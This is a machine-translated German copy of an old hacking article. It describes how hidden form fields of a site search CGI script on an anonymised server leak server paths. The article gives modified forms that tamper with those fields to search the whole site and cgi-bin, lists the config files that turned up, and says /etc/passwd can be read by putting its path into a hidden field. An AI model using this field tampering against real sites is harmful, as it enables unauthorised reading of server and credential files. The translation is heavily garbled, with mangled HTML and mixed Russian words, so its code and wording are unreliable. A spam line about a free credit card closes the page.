Undichte von Informationen über den Server durch ein verstecktes Feld HTML-Code

Undichte von Informationen über den Server durch ein verstecktes Feld HTML-Code
[2003.10.08, Durito] Wie oft haben Sie über die Gefahren gesprochen in versteckten Formen versteckt, aber immer noch gibt es Handwerker, die es vernachlässigen.
In einem HTML-Code index'noy www.xxx.com Server - Seiten haben ein solches Fragment: (unnötige Design - Elemente entfernt) 
 <Form method = POST action = .. / .. / cgi-bin / wsmsearch2.cgi> Suche Site: <input type = text name = Begriffe size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = Fallwert = Unempfindlich> <input type = hidden name = Abbuchung Wert = NO> <input type = hidden name = max-Wert = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 Handbuch / Aktuelles / _ http://www.xxx.com "> <input type = hidden name = resultspage Wert = / opt2 / xxx / httpd / htdocs / results.html> <input type = einreichen Wert = Suche!>
wie ist klar geworden, ist es die Suche Standortsystem Skript. aber diese Linien sind besonders interessant: 
 <Input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 Handbuch / Aktuelles / _ http://www.xxx.com "> <input type = hidden name = resultspage Wert = / opt2 / xxx / httpd / htdocs / results.html>
/opt2/xxx/httpd/htdocs - dies ist der Weg Der Aufstellungsort, aber das ist nicht alles.
Suchen Skript nimmt seine Daten aus einer versteckten Form: 
 <Input type = hidden name = boolean value = AND> <input type = hidden name = Fallwert = Unempfindlich> <input type = hidden name = Abbuchung Wert = NO> <input type = hidden name = max-Wert = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _
 http://www.xxx.com/ _ *. *
 Handbuch / Aktuelles / _ http://www.xxx.com "> <input type = hidden name = resultspage Wert = / opt2 / xxx / httpd / htdocs / results.html>
das heißt, erfolgt die Suche in Ordnern: manual/ updates/ und der Root - Server - Ordner http://www.xxx.com/ _ *.*
(Es ist interessant , dass dieses Skript poikovogo Datei gefunden wurde: www_xxx_user_list.txt in der Server - Wurzel, es ist eine Liste von Benutzern).

so ist es hier möglich, die Abfrage-Skript zu manipulieren. Erstellen von HTML, aber mit diesem Code: 
 <Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi>Search Site: <input type = text name = Begriffe size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = Fallwert = Unempfindlich> <input type = hidden name = Abbuchung Wert = NO> <input type = hidden name = max-Wert = 50> <input type = hidden name = faqfile Wert = / opt2 / xxx / httpd / htdocs> <input type = hidden name = resultspage Wert = / opt2 / xxx / httpd / htdocs / results.html> <input type = einreichen Wert = Suche!>
das heißt, entfernen Sie die folgenden Zeilen: _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com und eine Suchabfrage auf der gesamten Website durchführen.
Sie können auch nach Dateien und suchen /opt2/xxx/httpd/htdocs/cgi-bin/ - /opt2/xxx/httpd/htdocs/cgi-bin/ : 
 <Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi>Search Site: <input type = text name = Begriffe size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = Fallwert = Unempfindlich> <input type = hidden name = Abbuchung Wert = NO> <input type = hidden name = max-Wert = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs_
 http://www.xxx.com/ _ *. *
 cgi-bin / _ http://www.xxx.com "> <input type = hidden name = resultspage Wert = / opt2 / xxx / httpd / htdocs / results.html> <input type = einreichen Wert = Suche!>
Nun hat es sich, dass als Folge dieser Anforderungen gefunden: 
 Hier sind Ihre Suchergebnisse für den Suchbegriff (e) conf.dont_use in der Reihenfolge der
 Relevanz.

 1) conf.dont_use / srm.conf.old GRÖSSE: 7354 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 2) conf.dont_use / srm.conf GRÖSSE: 7436 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 3) conf.dont_use / sessiond.conf Größe: 159 bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 4) conf.dont_use / mime.types GRÖSSE: 2652 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 5) conf.dont_use / imagemap.conf GRÖSSE: 1062 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 6) conf.dont_use / httpsd.conf.dave GRÖSSE: 43652 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 7) conf.dont_use / httpsd.conf.11-20-2001 GRÖSSE: 43841 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 8) conf.dont_use / httpsd.conf-Backup-Größe: 13.243 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 9) conf.dont_use / httpsd.conf GRÖSSE: 43927 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 10) conf.dont_use / httpd.conf.vhback GRÖSSE: 7225 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 11) conf.dont_use / httpd.conf.11-20-2001 GRÖSSE: 7451 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 12) conf.dont_use / httpd.conf GRÖSSE: 7451 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
 13) conf.dont_use / access.conf GRÖSSE: 1725 Bytes TYPE: Unbekannt
 Term: conf.dont_use Dateiname entspricht: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0
und ein anderes Skript: 
 Hier sind Ihre Suchergebnisse für den Suchbegriff (e) Securedata in der Reihenfolge der
 Relevanz.

 1) cgi-bin / conf.dont_use / resetsecuredata.cgi GRÖSSE: Bytes TYP: CGIssript
 Term: Securedateiname Spiele: 0,1 Titel passt: 0,0 exakte Treffer: 0
 Teilspielen: 0

Gut geliebter /etc/passwd ist ganz einfach erhalten: einfach der Wert des verborgenen Feld resultspage ersetzt durch /etc/passwd .

Dies ist, wie Server-Administratoren manchmal versuchen, alle möglichen Löcher zu flicken, nakatyvaya den neuesten Patches und die Informationen aus einem html-Code durchgesickert.

Ihr Fehler Durito
_________________
ESSEN SIE DIE REICHEN!

Copyright 2002-2003 von void.ru Alle Rechte vorbehalten.
Wie es? Abonnieren Sie RSS Nachrichten!
Sie können auch shram.kiev.ua unterstützen, klicken Sie auf:

Seien Sie nicht zu Ihren Freunden und finden Sie diese Informationen, teilen mit ihnen den Artikel nicht in Ordnung!

Erweitern / Reduzieren Expand / Collapse Box mit Kommentaren

Kommentare

Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.
Kostenlose Kreditkarte mit einem Limit von 15.000 US-Dollar.